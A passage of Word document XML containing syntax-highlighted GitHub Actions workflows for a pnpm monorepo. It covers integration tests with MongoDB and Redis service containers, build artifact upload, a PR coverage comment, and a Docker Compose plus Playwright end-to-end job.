        </w:rPr>
        <w:t xml:space="preserve"> testpass</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          --health-cmd "mongosh --eval 'db.adminCommand(\"ping\")'"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          --health-interval 10s</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          --health-timeout 5s</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          --health-retries 5</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redis:7.4-alpine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'6379:6379'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          --health-cmd "redis-cli ping"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          --health-interval 10s</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          --health-timeout 3s</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          --health-retries 5</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pnpm/action-setup@v4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9.15.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run_install</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'22'</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'pnpm'</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pnpm install --frozen-lockfile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integration tests</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cd packages/api &amp;&amp; pnpm vitest run --config vitest.integration.config.ts</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MONGODB_URI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongodb://test:testpass@localhost:27017/test?authSource=admin</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">REDIS_URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> redis://localhost:6379</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT_SECRET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ci-test-secret-32-bytes-long!!!</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ENCRYPTION_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> aabbccddeeff00112233445566778899aabbccddeeff00112233445566778899</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">NODE_ENV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> test</w:t>
      </w:r>
      <w:r>
        <w:br/>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ubuntu-24.04</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unit-test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> integration-test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> always() &amp;&amp; (needs.unit-test.result == 'success') &amp;&amp; (needs.integration-test.result == 'success' || needs.integration-test.result == 'skipped')</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pnpm/action-setup@v4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9.15.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run_install</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'22'</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'pnpm'</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pnpm install --frozen-lockfile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pnpm -r build</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build artifacts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build-output</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            packages/api/dist/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            packages/web/dist/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            packages/shared/dist/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">retention-days</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">7</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">coverage-report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ubuntu-24.04</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needs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> unit-test</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> github.event_name == 'pull_request'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actions/download-artifact@v4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pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> coverage-*</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">merge-multiple</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 coverage comment to PR</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> davelosert/vitest-coverage-report-action@v2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json-summary-path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./coverage/coverage-summary.json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">file-coverage-mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> changes</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">reportOnFailure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">true</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="218"/>
    <w:bookmarkStart w:id="219" w:name="e2e-build-docker-compose-playwright"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.1.2 E2E: Build → Docker Compose → Playwright</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># .github/workflows/e2e.yml</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> E2E Tests</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'packages/**'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'docker-compose*.yml'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Dockerfile*'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'packages/**'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'docker-compose*.yml'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Dockerfile*'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">concurrency</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> e2e-${{ github.ref }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cancel-in-progress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">true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e2e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ubuntu-24.04</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Docker Buildx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker/setup-buildx-action@v3</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and start services</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          docker compose -f docker-compose.yml -f docker-compose.test.yml up -d --build</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Wait for services healthy</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          for i in {1..30}; do</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            if docker compose ps | grep -q "unhealthy"; then</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              echo "Waiting for services..."</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              sleep 5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            else</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              echo "All services healthy"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              break</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            fi</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          done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Seed test data</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          docker compose exec -T api node /app/scripts/seed-e2e.js</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Playwright tests</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          cd packages/web</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          npx playwright install --with-deps chromium</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          npx playwright test --project=chromium</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BASE_URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://localhost:8080</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">MAILSLURP_API_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ${{ secrets.MAILSLURP_API_KEY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Playwright report</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playwright-report</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/web/playwright-report/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">retention-days</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">7</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test screenshots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if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> failure()</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playwright-screenshots</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
